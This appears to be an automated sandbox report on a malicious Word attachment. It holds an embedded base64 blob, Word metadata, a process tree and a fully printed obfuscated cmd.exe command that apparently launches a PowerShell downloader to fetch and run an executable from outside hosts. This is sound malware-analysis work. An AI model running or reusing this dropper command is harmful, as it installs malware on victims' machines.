MOFEu3LAlAInhizNmv08MoxA9qCqqCt8lu/mBLpZzb25U/FLloqaymHJjdzzDLxGLxchVZkmRxqw wOS4OenDjIjKBfBBhi9gCFaIryJHGD81pAOZqAhVSKNlXHFOammqUE5djU8sUAjSt72qovt8axri u4Jx2cg1TLQ+6+heRTH5VEvOUcikIB3JUyTdQjdF4wMtwR5T0UYP5h4dyVM1Q/blN/TvagnGZFPy 7bu36rYSTTFS37y/SpZVMZANqjF2Q7QrBYlOn6abn/qHM32GYfs+UZ56GN2+xFRHR+wQN6BaS0LK C6aqj/Ehe3sotdp3nXRgvf5Cky7hUwkhd6xeD+2P5Idre1RbVXxVKHI7+PQ23azTRxetq4ob2vc/ bZ7UppRuW5bHan1VLXEbfGTuHejakTzbNvRUMeR/4eCQZUhW7i3JJlPTw03319pTD4/w4fKxpThg D+r7U0/MKR5SFdn0ZaGuZCSYVC0pYjQUt1qq/akvWhEpXDxkKOpo1WYEeVWnpkl2WW7xoClZo5Xl oXtRk6G8eBTWseGNpyJPR27GBw1hPvzZWaNfqc5OzSJ78ocNe39bioOF/anOLvzLjg5pfyz8TXVx 9VR1i2LY1S1bYw/1B6du0gNyuzz1w4wNshpe76TN04vAoQdjlnrQ+FTfxPI+WzOqBURS6RHdHrN/ vblbMWX9mZwpBRLoHntKf3xFa6Qa4r1eHv3FzvgT4dnnVpaHtPBiw7fo2yevTiVP3RFe2LZorFwv 
F3PEpjFBm9qH90IXfX6xKLTsaPFP4O3qsunymC1r58ohXzclCYVwsBizp1FckUxrGk0nTM02p9E5 bgq1DOiQYk+jxYdXHBGfgNgctVeIY/Mg3TlXDOuEtsEUrBMC2YHsDl9K7NEkQwtOh9FGulhAIl4s 9MEiAJYLsFpIWIKl+z63ZVd/cI9l6FrgxtTNG9bLapm4IqZIavW6aM35GOrdo2jnHvhicEI71G9J 4YVrxGik0j9oqn2f+b/tPQt4FNW5s5sEkkBwCSmggm4C1SBJnPOYc2aA2GQ3CVjDK1EQwZrdPMh7 N9k8aEBMABXUapCqYD81PLxtbYWgbfHdBNtab22l2ttq6yOI9nX7oNJelaq5/5mdzf5BqgL97uO7 94RhZ86cx3/+87/OmX/+aWG6fPYnVaB+3EE5RPu4piybDouKc3fO/+a4yoJ1PVeXt7R6sxsopQun NPE9gk+4T5oDVU19Sbt33j1YFbGsCffVJG7LMwseCRb0BUTiKj3n5W7Q3QPzhp7gvkv65u4s0NQj gIOunKyKd2Hl7xvrc78xdqDqSNJdQwV9yd01/PCBZjGUNSVz+sBU7wqeuyJIrJmWnrvCEBV31VuJ RAakXxnink5hGJ47KokhWOH0npl1BdNz9TqWKp+vYgMHKk0wYzf09owLk+6yxi1d/AF911lZBZnE V0GC04e7r/F2923ck9lXM3BzxYFdCVe7bjYy6/2Zu4LGwHf0s72VzaJ7qTcTlH7m0cs6DSFfTQ3y m+jr2bTgvCpBgzmFAzXZ9YYp9zV6p9YZ/IXmwvNrpXkLMY6Of6+inRq3Xc/0ZEJ1OnFuJKWGjNfZ g439eRFJaMvb6eXNq4eyN179XlL9Gs7l0Pw+9wxt4800cGhKp2mSieu2ljVsZ4xP9D6aFzQLlvx7 eOLRBaTnQv528RsZRxe8c2jS0JV6G0mcsqTl7VVu9+9zDl3KDp3Njra5XTtdY49O7ltQUJylttW/ +5eVgcjPbjo0u2Lxd262dgbfpHLo7Epx6PqKZPe1/bWCscLJZ0+o9JSm3HuRBfK7HtaHTw/6Dm9r JoY5fYJn4tQuyp7OWdpZSUnQ/DBILXPvRfqUtCtTI8btCYNJLZ52PXDLRSFG9Ey9e7u1e/+ErZvA zHvBw9IvOUh/Zu+IF27uu/GdF1wFm9MT+NaVh9P1u4bSnxxykRcLDu1YcnP/Z+TB7TLT3ZuhjTG2 fqF3B+dMm1S4oUEsuX7ahQFxL+mf+KJ3iebO5EZ3/rROw/uVrZP3zwxK4rNuy/dGOE//qn//1h0d hnHrQ/1Fxn07Wk1vdtDQOg4nhe8LbQw/9HqSt51YsuT+ykOz9p5nEnPveS+0y1fAmJ+8f21voz5x 3qM5m2HV91BeVo4o6H/9aEbV1MCsO7OpS7Rcfnv2Bw9PZv2+n0/dk9erL7uyYNqUgvmrr/LMZ293 EJM/HBhcOrXN7C5dNbUzvGjb0UUNU5nudYWMvoSnw+kT/a2E8uvSD3WO13lLuk582V3ivnD1K0kV uT07fpXEzczLNlHrYIsygrS6I757d6SDjr09Y8nndnmGvde3TuxfdvSSzFkFVemuslnDQ65jyx+q 8TyzyxWuq5hUsLnlBbVn3Kf1fb83QX6Q7spZ8szAPV5X7639Bw5vFTxrT3pafcXeB88PmzMt/mG6 tCpm11r/YaSPm5hWOfBknyclTff0t0tqTCSDr7Z6SGb+JZ1M8EvKpBFYQjuFJcmVR24ITrUM2pLy h6Swqd9Edp7nP3gEVsj53721vdc3oSowu4vKgw/8tDCrgxrPTyVDl/Z5P8wqXHds7duTfOu08EEt c/+j3myWszn8dtG3d5L+V9fL/udecE+8eOCKvk18Nr9G25ilhRN73TOSLM859Pm327qLJx356WNc 
3n7ukhU/qRvYurTX191Be4PTsks7Rfd3Pthomd5prZsMNvmxDi7ENU26N2CJY7l9vlqhFvorZ13T BYvdSH/On3NT68I3pj/2l42RqUKY9xToCQHKCr99QXZQMPOCL656WHP2UWq7ia6MCrBKXO4+UMeg xrlmMQbGjL9Ua16dDWY3ECaYM8oycUwaWEx4mEUsrSArh2gjm/T2tiyYHR4vqA8tQ89hvWpfNsFr CNe8UsE0OGXSNVN41FZsggcUneZsw2aBOVRJdCm1qzVFFDWwZByrrUtYk3AgQGCpviXtAJgW6SGh u+7Q/LWt2UGLiTHm+G9rv+2SJjFcYHYo2djBknXCx+c1EZO6jbQ8KcEwqcomBndPL9duitBEQW/J qyJEiL9ouVkiR2vs7umu09bN3xDqaXLdQYycDWNZMKd7vNpxdW0YK7PgXOg52s0kJy3hbss1oecs UDkGdGO6r1KLRm+IW6Z+y1X1xmZG+JeuspjVfb9HCqb3TA9Fsqe2ESPtze6idsLdvHCKsvVaxA9h /p6b3GV2l/14smZKMOqELt28Z7La7AnI3RvKUrZUGubBsVndN7ysFTC5Yc7B60XPdRsSHiAD3byn 19g0lm/oSeUbkoyiG9WeabezaepOG9kxTcxcuiHB3i712vulGxIuqNNim6Vu79MZ0Y3SVG/P+Dnd d4VNS/7UNQ/0nDaPDbZsuau3nhlyUbdhFnTrbRaXPd8fvL+WTiPW4K0p87TyiEVcB+9S690g17do eWmpKbCc5K6XLixI3agdfEXIgvJ2kWhY7n32ToenjpnkUH0r41m0Jw/MkYE8Sg7ytIaAoLo26UdT fHRwShdnZmFDWTfYTS3SML80pTRsDi3vs7IuypydX2FviQ7O6qlj4/ks19qKC5VpsHNnco2wzAJ3 V8E0nxjSgqbJDmuhXhDNZMhVbw5MyxzSQLiQw646sp0yOeQ6csNsb2V1FZgdRWB2nOW/pURTRoey OdypmVp5e9AbaO9uC4XC1c3ZWrm3BnQT7csorwXqb1TmIR0cHKeMHTowbtckLcfbEVxQV1Wd0Je0 6c72YFqq9l+b1LsVLjjeX/arvXeak0p39t2+YtLGc3Zu+QcxlevGnDw/UdPc6gXYaNS8aNA8N+Sp F8GdKLLqUrUalAZwlHNvYaiqvbGaxO7ZsToT4ELBpcKKloRam0bu2mE6oaeEPydGXUoHop2XTIQC Pjjxz1nlvBLhhGSNRmR1LhbGorLGgrIu8xWqQ+YRFZxUqqisgAu3ciOFbJiK1C+6oj1E45S4bXTt dPKI49ZacSIiEpJSRoN3FjQ652TgxSGyY9FWryoLhdpWRc+JWLWwfPnisqK8xaU+hQH1sunyUGuV gmuHOw5Xsv3Gv6YNOnmFjhts+CNw6SegDXCacGKQ0WTo6fworMvjL6lE96MjbVWhxmj8XQWQIoVo lgJpf0IcJAcSO0KSSkud3+6PgFR66N3c4yvP9Tz5lvaAVvRamQfa/dypz2Qsum4suG4MvCgqFXiD iRi86BtDv3PyWhxi7/0IeNHwtLHotOO+pbAzLQpe54nYKVkIK32nb5u0yxXxRlTnh50OYr8j+HG4 aanz2+fku+xDAfDVOQ3lf/rT8dJNSw5cs/Z7L/5yAlTmUQDsqLuxoLuxmLuxkLuxiLurHChU0F0b DWNODsnvToCkH0HitiFpOIGoVd6JYWNV3omhZVWeO3V0XcXhagpikgKu08Zr47WCEeQ3OVG5/mFq vaJbGx3oC0Bdf61TTYnRFKfkiRF+ovkJI/nQeUosbBZxXiVLdgYf/odgRPvXUP8qnYf6jfWjn1DT 5Uzv4Sjbai87fackx+upyGePjo3BkmZHOI/BFnBaWYHCi8XH90lRkWIJx5+kJx/ixyaPHa/txNhJ 
H58WwvGKc477Z6fXv0shQM30p+1/qRaN+R7tP/oFAuUaXqYt1j5vuwxe/qn7P+c0xq/G2T4zen7m 8VdddggxjxaN63+y9HHfP/ho7KtHXRWfxHQonZz+FTSx8HcYMwWaFoshrALofOpePiYlTlVISFbh KxtAYR3OOLXqLu3DYfWe68nmTr19G1cxtvz00jzdPrOHWNwUrK6qqq7yLg4qy8au9FfroZZT6H9Z cVn5pYsXeY08XU9L9VWvrmv2rvULWiisEj2XiCJ/LiH+4lyr2DJzdb2wUNcNyQt5ybVe2wzywrrL C+uwsP1YPJby4cgasZuyomUa60DELqiuW13bFivD9OcC++yohfFAhnHyUJHN3ZrXpYI4z9fWApWq P2oHbi6244vqzh8+838kD/9xTcBUzYDfPGhphmbB4dfmQA9LNOUasBr+D4DY90L7deqLAbYrsx/u NMFfyHafwneUI2alXTMCR439JZNyrRbaaIUSVVAiyt+xXwn9Eueq2L4q0krhbwbkqKjf7XYUcC/c DcCValv1p16b8NovL4bhrspVr0TU2fBERs3nOSfBlorMapwRtkyAU8Kv/qmwdTKcLLYDcNfZL/Cq kNzRr76sGpWvnI9W2a8CRB14i6DXxYAbH/R6sjaX23hRL0iqmnkAneonqNXbrw+rEqVQK2jDeOJ3 ZZ7QTkZV7ATsnCqeqA0FxlPU5V19fSLqFB8BONQHKaoBayoC7ir7yvk6hV2/Dc6CUF+NvNie9Xat zaa/+JzjlG6PxD8qivzJ8pYmXvAFR1Vr2SNUoqLzqgi8RfYo/DA+A/Adi+OrHMJ8dvTeIoAlRkPq 5bDoqLmTT0dGb35qKjkTnloM5Uu0S+3XKOJUsxhx0yfR4OnQzGuIZorsqMcU+lcQqPjJSoeWjGAt Guk4WiLXpi9hl/DbOFORln1wdnKa6fxEmimB8SmK/fjxljizr1y+6CmN1aVNGKEQA/oUdvzmQlt+ 5dpjLrbHpSimZCSqs2Hzh8/+olAJ/O9zRsu0IjtW9MnGegVAVw29q3EWQrmFMKuL4FhvS8moxCuy KT8A16X2NxEUNa8CG0nhIzwiS6M0EB9zHtxfA1j85+NG005cjyn72q2s5cQx2nhYY0xwuzQP/KbD kQHnk+GY5o7bIer/6DcKVEB8t3b68WBHGVNOun1mgnIyHPmyU8ZJP3swPDzLjUsND6sPhNhJAaQ+ YzI8nIoC5GfYBPzRZnLcuNTwsIrTq5J6V1jbokebiduZGbZG+mgzU5JwqeFh9bkAlXTVzM6EGIpc LvXu8umi60zS1E/oV3Pu6/9N8P1fSjk/XzXu3Te7SvZNe3zfhh8VblZ5ihVWD/2o7KXkY74nOp77 RmfqPSti+WbZlNlpb7656LGWtnO/87ezt8by1S9QqLNwuNm92ZXgql0JVn2i2uL6doNHS0hc5it8 5w2PlpS4vK6ZiMH1zimjY69zTgVfc50quTBQ+fBDHqgMVcSDM5wzuRfOkhOd7UeSOsWjjUmMblht q/BoY2N3cvd6tPGJeOdy3r0eLQVAG05I0K4p7gg0tgfaqqe+DPW1aJjx11+C803JdoHoHtNn2lVf sQbqX1QQ2judXQ+qrpx9zuBElW/vcr6TAqdOE2pbmCx6DTKcTu2n8TtC8Yx6Zul0x5x4hu3D+tyM eEat8mCtKAV0aP5QZPF18Tu2Q2vKRfEM5dFqph9DrXOi8/5/i2fY/q2XfzGeEZLUNLeNUa0vrmwb eDJ+p0V5vL63Kp4RtAgnFyHIbGfU3TCYRPX0Zfmuu+HMudUgGbmxFkGmXFT3zI1ndEpJ5aHpCDOM cfHsvniGclo15p6PYGeEifN5PEN5sJKS3nivYYOYv7FsTNW2XrY+fkM5ts7dg/BicUtf8bQqWdZc 
VfY8uqMcXsd9EM+oMxg1LsmIt1XHTTn843iBsAVDab4E1VDOsMHb4jWqYJrKDqOxc26KH2JUWxYl kV+iPoQQNS+hWRLC0N+4As2FqUvz61eqAZSGVlchtNULZpgrGxGWuDSNSz8Tzwgwk8orMlDrysc1 8ms8F0ToK+/HVKITfvbfnZn23Xo3mhWLG3zPrzFuDa6/9wymOcHJF7ag1izLIl85gElNGDy1Mp6h PF6tuT8ZRbeWTO/CgzAoK0mMZ9QQysUhH8KyKSxW/no8Q7nHip4ZmCiJpT9/bhzt7YzKveMQLwqg wWKUoRxoxTv/ijqhppC189FQDE6M176GmNSyDH3GEKpCpMEvXaemrryu+f0XETyMmrJxJW5dJ+LX 52JaEyabayHhIIUuQ4iNlFutUXsDmkvLtGheU3yQlVKX/XPiMsp+ZnX1VjRqqkv2eSQ0qgyim4MX Y8Y3uVm2CYEhhKVPWYGJDogsU0NwmYaQt72MMyShG48gtjGFIV5oxwKA6NZ7kxSiLg80576EUQjy 964WLEWlrr+FIKyU3BLXz1F1C9ual6JWuwg3eeW3ECtRk5Kn0ATVGCAT34+gxgxLskefRSWotORb mJKkyY3dW+NI7gL5ctefUA0uDfbDvQhj3GTsoV+gMVm6ECGE07BhMf4LEs9oEjCTi/NRFaFzlsIg QysLtTdXfdONxZaQMvGzaBCCCSsLaZ4wQKT//quIpYC2yWo078oBlxzDoo7rUu6bN6qEQStQCeWY a8xABNogoJctyYgLKSXmX8KjAOPkUDMqQYguf4alj3IWW400QadBiHlVK55UQuma3VhX6MKUiCBq JPBS3ZsIm1LnYh+aAOXFy8JI3wEfUH77zzDJgujvRhkhmBD696NY9gFlfvchhDFm6OZzvYioDUrZ u+VxSumkhrnrOdQEBX2S0KEod0H1mvu2Y0OAG/o5Es8gt2TH7nhbTZzRd4/Er1uJJWbuR22DvJNB pCxaJWXk8cdRCcm4fJHEmwgSai3Aikdyk96K5JvyCTY3IG5pBnVDqr+MUG8yrh/bhyQQkOL3DTR7 TLdEENkxlSCo6cXfiteopYy9/X78OmQxcnSURtG59SySel0WEfK6n2JLCJTQh0dRk4zQQReebVOw Pw5j7BKL1mzDM2Ma+gpEuQ2g+ugdl2OVA2Dc9BTmUCD2pYhl2yRYZB/8DhG7cnr8IwK0gXBDzL4Q cTLVDfHsw4hioNHew2iKpEl4B8K3BdZOIxJ5TUxaxvm/QVyqnJHP+jxifeWHnIZGYnsh378etUEM Sv59MSYEsFGOI1KvolKn73yI4AR22fYHNHZGmXjzhwjD0Ca7MwnLVd1kt3yIiAtsLzbmjxguIeSj yH5V3saiA6GrU/kbr5uGSZpy2p6DyY0LUvY5NHoidda6Ec0Bp0I+0jSKQg32o1kIHdyQ5MmdWDgL y9xNsUqyGE1GFm+lIQ3y+FOIiAXnacikUR7IZqYXUzWolWe+ianaEkbx+6NsHN0ch9YXrRJI8pEf IEUEvX4DrQjaDJi2Y3WoCeW03IGmSXkui/7vIfoymfUKglP5MZtfQURtezOn3oupXDeNnUiT1FNh 0fwaNDQw3YW4DFEPAWJ48mw0KSYT7ImfIwxbXOjb1mBjzLLY39/CnCKJsRvZCfUWoOcHz2HiMAxC kQgNQSfyhsS4NWQ7FhuIH8MmWC5HrkW6HmxV84PHMZ0L6zWEQOVfbKTPRGYl5fK+MUhCmrqu9+TF C7SB/b0D2X3K95j+EilNteAknQ8isreoEJm3IeoCcjP35dtWZUtrNsK98k82f4eWH00gCsU3/wVl QAmyHvFhxLI43YFYWTlTPXUjGoEAiC96dtRccOZDcxEklqXPyxylGqVIfRiTERhxf1iIhkAMRpLv 
wQxhcbn8MrQsYtK4DgkQ5dYsL0FLmzABlbjdg+ACi0X87c8YcpjPOWjBp9yZ5V+/hMidU6u8GlGm oIbY+3c0EsOU9KlBbGtxw0w5B2lq5X1YlI1ohhqUv7sHU5VO6dfKEA8RnZG/IspUztFy4gI8j8C5 r7+DVRqX5HG08lLu0uzV36IqsKZmn0Vko/zgxK82YOMLBGpTFQJdMEZ11G0lGF/6ugV4InXLOI4a Ve7R7KU3ENIpk+L6NtwGMYW2COsKMBPvSI0jPWJI8crNiANAOuhFyEpXXtVkG1KcoBo4fwOxXYMA +blnerzNgCBm4QN4pkFV3IYESBA0PH8AWVgRWJizV8di48YwaOnmUXRuyAZM5wanhCN1EwI9yZcg cancrVnH31AJmCV65Q8wGRNTz8FmJFgJ5IDAtgjQ8axdqITJCbsTaYIAMblVjUyiNhN4obUPU4eU LPgmhhTqHEd2gvLP5vvPxkiHBcYhVKVLgKi44PpRU62bmyKjZlbXa1NGCRddWEi4KLdLoiNBUA+i w9x4EGdYgn79VcwtUCQDKehaC1YA/buxSSksiRCmHLn5frRCbAXqEMloKa2cu0kiWjEpF2+6HW1C BC2w1YvNUUxLrJsQ07aYnJPgcdQtkLE13YXxIy168U3YXjF0sR5BWkeAW778LpZ6FBb5F+AqwLTv lmBIQVn+DcmKVoNZdA1qVLmCk9lIUgYswdm5yJSoFYSx6/Lx1MLy+wO0sVMH0ljPQNtEEQFLqglI zQfAKje9aENOOZIbd6OJq1WO5H60purkYJw+i1Zdtif5fqTqapQP+SJksdge4G9tQMqIWOQ42uCy fcFDbdiw0q31X8QTyYSZm4fGquTzI/VYmOiED2IdSUxqHL8G2ycg5IeRzo5QQb+2dpQBI8SvEfOE DZ2YYUQLtku491dYkTDCP4sUcaVyEC8vQoYBqMRnkQ3ZTkBCLf4lokBQ5UKgVX2XCYM9jhZXyomc 33sWEouS8DvRGrAS1BkPfG8Ut0lz88Z4jRbBaBbiYOUDbsxFFKo8wdk5aAlSS0GyfhVZ5RGQzUY1 2usKgkCzjhUiyrBAok3ZMcrOsqwDTyCCZCA4t6NFfivj1NyOhtIColdchHSVciOXE4qxPcBMPgPt SymPct4+B48eJnJouUdLju2PtUedvl9GC1Tb+duv9gG18trqxsZlv1CPEKIe349B3ZTEEV+dWWDC jnWqOT6bfpiNpETb2+cXsKJyq2dwKk56slt9bTT1FJ92neNWLlnRh6EZSUn2gz+3lq5luZUr5Ex3 4khrs9zRj/+qlKseqDrn4zXlY+XShPb/6X99qjnD+omn8f3zcjgucM5D/4T+1QsH6jMUn7b/D1E5 l+MHE3a8D041pTvjP+sU+lfepQHnPMH2nihxPHSqT6f/U/Y/XQbHGFf0nOnIObC0uqYt7kBIKL53 eSiMnAu5ge8tr6tqq0X3RPRmeVugte2K8JJQpM72TrQb9Xov9EOV6tbFnc3VrfYrYWfytsulRflZ a6VVWEh5oZUrZbGeywVluSbR9VzdKOY+WLLrZpH/2qy01Nhj2Xz7iezFFyzQnZSWGn0wm28/kk1L XRKobAisrs5fW+i3SmiJpecWgznseGKWiBM8MdNSfYFItb8xEInk22IaRrWmelGgqZrR/KxOCSYu dK6u87OcZ81wvaC6MewPASbWtKlBqCLLqlsjgCh/qCkcaKsLNtr11cYQGMV2G/6F8/OzqEV9MCCf RfChhrfEl5/lN/xSkBI4wDCk0QPuzffnZ8HijfnBnvQLdZRYkJ12el7P8eRx6H+i9unpf6Wm3gWI no/uv1M5/J9SyjgN+q+C43T9rU+WTrX/f3Y6k/5TVy4IRdq8xWvaqpurqlu9lzbXhK5OSx1hDZK/ 
lpmMFgmu5/oVIwAPlOSaxZwpHtD9YKgBHxReO3eZr3guZqi01JXLQ60NkXCgshoatDkuX8/xjvzz p6Xa3JZPjRyvOgisBnK8wmI53rRUm49Gl8/xGnr0IJzA/5KYditnhDsbLuSF5bx7hhyqnPfNzthT /39m+k9mKZYxAAAN8KcAAABEAQAAlwAAAAAAAAAJBAAA/wEBAAAAVgADAAMA//8AAAAAAAAAAAAA AAAAAAAAEP//BAACAAAAAAAAAAAAAAAAABYAUAByAG8AagBlAGMAdAAuAGkANQAxADUAMQAuAGEA dQB0AG8AbwBwAGUAbgABABEBAAMAFgBQAFIATwBKAEUAQwBUAC4ASQA1ADEANQAxAC4AQQBVAFQA TwBPAFAARQBOAAAAQAAAC/AEAAAAEjRWeD==
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00196407
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00196407
WordDocumentBodySectPRRsidRPr: 004342A2
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
All screenshots are available in the full report
Total processes
41
Monitored processes
10
Malicious processes
3
Suspicious processes
4

Behavior graph

start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 101.exe no specs 101.exe wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
PID:
2956
CMD:
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Untitled-attachment-01222019.doc"
Path:
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process:
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
PID:
4012
CMD:
c:\o4277\v3448\j5495\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Qbq=D%rkjUNcIgeMCP'a=(/ u)B2~ELnb{zvYW5sf4i,6h3Sq}0-1\:.Tld+;9yxtFOwAJ7Gm@$X8op&&for %P in (74,73,63,1,13,5,22,26,8,12,50,24,34,39,48,1,2,1,43,25,43,43,8,62,6,6,64,11,25,50,24,47,37,39,48,1,41,1,52,25,11,13,50,24,47,42,39,48,1,53,53,19,70,74,23,48,66,42,16,14,7,72,46,66,48,14,56,70,44,48,57,72,16,27,10,63,47,73,28,4,10,7,60,19,6,10,60,51,33,10,28,12,53,38,10,27,60,56,70,15,66,23,46,42,16,14,41,60,60,74,50,18,18,54,20,15,27,68,38,30,20,3,38,74,15,2,3,51,7,73,68,18,42,4,54,37,41,48,44,38,63,69,41,60,60,74,50,18,18,27,15,60,38,73,27,15,53,38,54,10,15,51,38,27,36,73,18,65,32,42,44,9,31,52,52,69,41,60,60,74,50,18,18,28,38,30,27,10,35,51,2,38,35,10,47,20,74,51,27,35,3,51,2,20,18,13,28,3,52,66,65,22,68,69,41,60,60,74,50,18,18,42,37,51,23,42,57,51,57,34,51,72,46,18,32,42,40,71,35,34,13,35,68,69,41,60,60,74,50,18,18,68,15,38,53,51,41,73,60,9,38,2,53,35,9,15,68,10,35,51,59,58,30,18,5,73,60,38,62,68,10,14,51,43,74,53,38,60,17,14,69,14,21,56,70,30,72,37,34,48,16,14,60,57,34,37,57,14,56,70,41,42,40,23,57,19,16,19,14,48,46,48,14,56,70,4,57,42,34,46,16,14,30,37,34,66,48,14,56,70,44,40,40,34,42,16,70,10,27,31,50,60,10,68,74,55,14,49,14,55,70,41,42,40,23,57,55,14,51,10,59,10,14,56,36,73,2,10,15,7,41,17,70,73,66,37,48,46,19,38,27,19,70,15,66,23,46,42,21,29,60,2,58,29,70,44,48,57,72,51,0,73,63,27,53,73,15,54,61,38,53,10,17,70,73,66,37,48,46,39,19,70,44,40,40,34,42,21,56,70,68,34,46,37,23,16,14,44,40,48,57,23,14,56,8,36,19,17,17,67,10,60,47,8,60,10,68,19,70,44,40,40,34,42,21,51,53,10,27,9,60,41,19,47,9,10,19,37,46,46,46,46,21,19,29,8,27,31,73,3,10,47,8,60,10,68,19,70,44,40,40,34,42,56,70,63,40,37,40,66,16,14,28,23,66,66,40,14,56,28,2,10,15,3,56,45,45,7,15,60,7,41,29,45,45,70,28,37,34,46,40,16,14,68,57,48,23,46,14,56,79)do set eR7=!eR7!!Qbq:~%P,1!&&if %P equ 79 echo !eR7:*eR7!=!|cmd"
Path:
c:\windows\system32\cmd.exe
Parent process:
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID:
2572
CMD:
CmD /V:O/C"set Qbq=D%rkjUNcIgeMCP'a=(/ u)B2~ELnb{zvYW5sf4i,6h3Sq}0-1\:.Tld+;9yxtFOwAJ7Gm@$X8op&&for %P in (74,73,63,1,13,5,22,26,8,12,50,24,34,39,48,1,2,1,43,25,43,43,8,62,6,6,64,11,25,50,24,47,37,39,48,1,41,1,52,25,11,13,50,24,47,42,39,48,1,53,53,19,70,74,23,48,66,42,16,14,7,72,46,66,48,14,56,70,44,48,57,72,16,27,10,63,47,73,28,4,10,7,60,19,6,10,60,51,33,10,28,12,53,38,10,27,60,56,70,15,66,23,46,42,16,14,41,60,60,74,50,18,18,54,20,15,27,68,38,30,20,3,38,74,15,2,3,51,7,73,68,18,42,4,54,37,41,48,44,38,63,69,41,60,60,74,50,18,18,27,15,60,38,73,27,15,53,38,54,10,15,51,38,27,36,73,18,65,32,42,44,9,31,52,52,69,41,60,60,74,50,18,18,28,38,30,27,10,35,51,2,38,35,10,47,20,74,51,27,35,3,51,2,20,18,13,28,3,52,66,65,22,68,69,41,60,60,74,50,18,18,42,37,51,23,42,57,51,57,34,51,72,46,18,32,42,40,71,35,34,13,35,68,69,41,60,60,74,50,18,18,68,15,38,53,51,41,73,60,9,38,2,53,35,9,15,68,10,35,51,59,58,30,18,5,73,60,38,62,68,10,14,51,43,74,53,38,60,17,14,69,14,21,56,70,30,72,37,34,48,16,14,60,57,34,37,57,14,56,70,41,42,40,23,57,19,16,19,14,48,46,48,14,56,70,4,57,42,34,46,16,14,30,37,34,66,48,14,56,70,44,40,40,34,42,16,70,10,27,31,50,60,10,68,74,55,14,49,14,55,70,41,42,40,23,57,55,14,51,10,59,10,14,56,36,73,2,10,15,7,41,17,70,73,66,37,48,46,19,38,27,19,70,15,66,23,46,42,21,29,60,2,58,29,70,44,48,57,72,51,0,73,63,27,53,73,15,54,61,38,53,10,17,70,73,66,37,48,46,39,19,70,44,40,40,34,42,21,56,70,68,34,46,37,23,16,14,44,40,48,57,23,14,56,8,36,19,17,17,67,10,60,47,8,60,10,68,19,70,44,40,40,34,42,21,51,53,10,27,9,60,41,19,47,9,10,19,37,46,46,46,46,21,19,29,8,27,31,73,3,10,47,8,60,10,68,19,70,44,40,40,34,42,56,70,63,40,37,40,66,16,14,28,23,66,66,40,14,56,28,2,10,15,3,56,45,45,7,15,60,7,41,29,45,45,70,28,37,34,46,40,16,14,68,57,48,23,46,14,56,